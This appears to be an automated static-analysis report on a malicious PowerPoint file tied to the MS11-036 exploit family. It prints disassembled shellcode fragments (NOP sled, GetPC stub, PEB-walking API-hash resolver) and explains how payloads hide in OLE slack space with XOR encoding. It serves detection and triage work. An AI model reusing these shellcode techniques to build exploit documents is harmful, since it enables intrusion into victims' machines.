MALICIOUS
480
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1055 Process Injection
The file is a PowerPoint document containing a binary-format RCE payload, specifically identified as belonging to the CVE-2011-1269 / MS11-036 family. Static analysis detected raw shellcode, PEB access, and an API hash resolver, indicating the payload is designed to execute arbitrary code. The payload is likely injected into a running process, as suggested by the 'process-injection shellcode' finding.
Heuristics 11
-
PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOADA macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
-
XOR-encoded strings (key 0x92) critical SC_XOR_ENCODEDFound 2 Windows library/API name(s) XOR-encoded with single-byte key 0x92: 'advapi32.dll', 'shell32.dll'Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'xchg' is 55% of instructions — a sled or padding/filler run, not program logic).
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
NOP sled detected high SC_NOP_SLEDFound 20+ consecutive 0x90 bytes
Disassembly
x86 disassembly · validity: uncertain (0.662) — 9/11 branch targets land on an instruction boundary (82% coherence)00030E2C 90 nop 00030E2D 90 nop 00030E2E 90 nop 00030E2F 90 nop 00030E30 90 nop 00030E31 90 nop 00030E32 90 nop 00030E33 90 nop 00030E34 90 nop 00030E35 90 nop 00030E36 90 nop 00030E37 90 nop 00030E38 90 nop 00030E39 90 nop 00030E3A 90 nop 00030E3B 90 nop 00030E3C 90 nop 00030E3D 90 nop 00030E3E 90 nop 00030E3F 90 nop 00030E40 90 nop 00030E41 90 nop 00030E42 90 nop 00030E43 90 nop 00030E44 90 nop 00030E45 90 nop 00030E46 90 nop 00030E47 90 nop 00030E48 90 nop 00030E49 90 nop 00030E4A 90 nop 00030E4B 90 nop 00030E4C 81ec00080000 sub esp, 0x800 00030E52 60 pushal 00030E53 e800000000 call 0x30e58 00030E58 5b pop ebx 00030E59 81ebac104000 sub ebx, 0x4010ac 00030E5F eb30 jmp 0x30e91 00030E61 16 push ss 00030E62 65fa cli 00030E64 10ec adc ah, ch 00030E66 97 xchg edi, eax 00030E67 030cf6 add ecx, dword ptr [esi + esi*8] 00030E6A 22b97cac08da and bh, byte ptr [ecx - 0x25f75384] 00030E70 76ad jbe 0x30e1f 00030E72 9b wait 00030E73 7ddf jge 0x30e54 00030E75 fb sti 00030E76 97 xchg edi, eax 00030E77 fd std 00030E78 0f7ed8 movd eax, mm3 00030E7B e273 loop 0x30ef0 00030E7D ff .byte 0xff 00030E7E ff .byte 0xff 00030E7F ff .byte 0xff 00030E80 ff .byte 0xff 00030E81 ff .byte 0xff 00030E82 ff .byte 0xff 00030E83 ff .byte 0xff 00030E84 ff .byte 0xff 00030E85 ff .byte 0xff 00030E86 ff .byte 0xff 00030E87 ff .byte 0xff 00030E88 ff .byte 0xff 00030E89 ff .byte 0xff 00030E8A ff .byte 0xff 00030E8B ff .byte 0xff
-
x86 GetPC stub (CALL $+5; POP EBX) high SC_GETPC_CALLx86 GetPC stub (CALL $+5; POP EBX)
Disassembly
x86 disassembly · validity: uncertain (0.619) — 9/12 branch targets land on an instruction boundary (75% coherence)00030E53 e800000000 call 0x30e58 00030E58 5b pop ebx 00030E59 81ebac104000 sub ebx, 0x4010ac 00030E5F eb30 jmp 0x30e91 00030E61 16 push ss 00030E62 65fa cli 00030E64 10ec adc ah, ch 00030E66 97 xchg edi, eax 00030E67 030cf6 add ecx, dword ptr [esi + esi*8] 00030E6A 22b97cac08da and bh, byte ptr [ecx - 0x25f75384] 00030E70 76ad jbe 0x30e1f 00030E72 9b wait 00030E73 7ddf jge 0x30e54 00030E75 fb sti 00030E76 97 xchg edi, eax 00030E77 fd std 00030E78 0f7ed8 movd eax, mm3 00030E7B e273 loop 0x30ef0 00030E7D ff .byte 0xff 00030E7E ff .byte 0xff 00030E7F ff .byte 0xff 00030E80 ff .byte 0xff 00030E81 ff .byte 0xff 00030E82 ff .byte 0xff 00030E83 ff .byte 0xff 00030E84 ff .byte 0xff 00030E85 ff .byte 0xff 00030E86 ff .byte 0xff 00030E87 ff .byte 0xff 00030E88 ff .byte 0xff 00030E89 ff .byte 0xff 00030E8A ff .byte 0xff 00030E8B ff .byte 0xff 00030E8C ffa6f3217064 jmp dword ptr [esi + 0x647021f3] 00030E92 a130000000 mov eax, dword ptr [0x30] 00030E97 8b400c mov eax, dword ptr [eax + 0xc] 00030E9A 8b701c mov esi, dword ptr [eax + 0x1c] 00030E9D ad lodsd eax, dword ptr [esi] 00030E9E 8b4008 mov eax, dword ptr [eax + 8] 00030EA1 8983d1104000 mov dword ptr [ebx + 0x4010d1], eax 00030EA7 fc cld 00030EA8 8dbbb5104000 lea edi, [ebx + 0x4010b5] 00030EAE 33c9 xor ecx, ecx 00030EB0 b107 mov cl, 7 00030EB2 e8 .byte 0xe8
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
x86 disassembly · validity: code (0.944) — 9/10 branch targets land on an instruction boundary (90% coherence)00030E91 64a130000000 mov eax, dword ptr fs:[0x30] 00030E97 8b400c mov eax, dword ptr [eax + 0xc] 00030E9A 8b701c mov esi, dword ptr [eax + 0x1c] 00030E9D ad lodsd eax, dword ptr [esi] 00030E9E 8b4008 mov eax, dword ptr [eax + 8] 00030EA1 8983d1104000 mov dword ptr [ebx + 0x4010d1], eax 00030EA7 fc cld 00030EA8 8dbbb5104000 lea edi, [ebx + 0x4010b5] 00030EAE 33c9 xor ecx, ecx 00030EB0 b107 mov cl, 7 00030EB2 e8f0000000 call 0x30fa7 00030EB7 83c704 add edi, 4 00030EBA e2f6 loop 0x30eb2 00030EBC fc cld 00030EBD 33c0 xor eax, eax 00030EBF b4c3 mov ah, 0xc3 00030EC1 8bb3b5104000 mov esi, dword ptr [ebx + 0x4010b5] 00030EC7 ac lodsb al, byte ptr [esi] 00030EC8 38c4 cmp ah, al 00030ECA 7402 je 0x30ece 00030ECC ebf9 jmp 0x30ec7 00030ECE 4e dec esi 00030ECF 89b3e1104000 mov dword ptr [ebx + 0x4010e1], esi 00030ED5 33f6 xor esi, esi 00030ED7 eb1a jmp 0x30ef3 00030ED9 6a00 push 0 00030EDB 56 push esi 00030EDC ff93c5104000 call dword ptr [ebx + 0x4010c5] 00030EE2 3d00500300 cmp eax, 0x35000 00030EE7 7609 jbe 0x30ef2 00030EE9 3d00600300 cmp eax, 0x36000 00030EEE 7302 jae 0x30ef2 00030EF0 eb .byte 0xeb
-
PEB API-hash resolver high SC_API_HASH_RESOLVERPEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
Disassembly
x86 disassembly · validity: code (0.944) — 9/10 branch targets land on an instruction boundary (90% coherence)00030E91 64a130000000 mov eax, dword ptr fs:[0x30] 00030E97 8b400c mov eax, dword ptr [eax + 0xc] 00030E9A 8b701c mov esi, dword ptr [eax + 0x1c] 00030E9D ad lodsd eax, dword ptr [esi] 00030E9E 8b4008 mov eax, dword ptr [eax + 8] 00030EA1 8983d1104000 mov dword ptr [ebx + 0x4010d1], eax 00030EA7 fc cld 00030EA8 8dbbb5104000 lea edi, [ebx + 0x4010b5] 00030EAE 33c9 xor ecx, ecx 00030EB0 b107 mov cl, 7 00030EB2 e8f0000000 call 0x30fa7 00030EB7 83c704 add edi, 4 00030EBA e2f6 loop 0x30eb2 00030EBC fc cld 00030EBD 33c0 xor eax, eax 00030EBF b4c3 mov ah, 0xc3 00030EC1 8bb3b5104000 mov esi, dword ptr [ebx + 0x4010b5] 00030EC7 ac lodsb al, byte ptr [esi] 00030EC8 38c4 cmp ah, al 00030ECA 7402 je 0x30ece 00030ECC ebf9 jmp 0x30ec7 00030ECE 4e dec esi 00030ECF 89b3e1104000 mov dword ptr [ebx + 0x4010e1], esi 00030ED5 33f6 xor esi, esi 00030ED7 eb1a jmp 0x30ef3 00030ED9 6a00 push 0 00030EDB 56 push esi 00030EDC ff93c5104000 call dword ptr [ebx + 0x4010c5] 00030EE2 3d00500300 cmp eax, 0x35000 00030EE7 7609 jbe 0x30ef2 00030EE9 3d00600300 cmp eax, 0x36000 00030EEE 7302 jae 0x30ef2 00030EF0 eb .byte 0xeb
-
OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOADMalformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 158,720 bytes but its declared streams total only 49,564 bytes — 109,156 bytes (69%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_office_off0000f000.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0xF000 | 158720 bytes |
SHA-256: ce63127fd658685d5fad80bb8df90292e46b9d3eaa2be9b01d5bc68d17d8b42c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.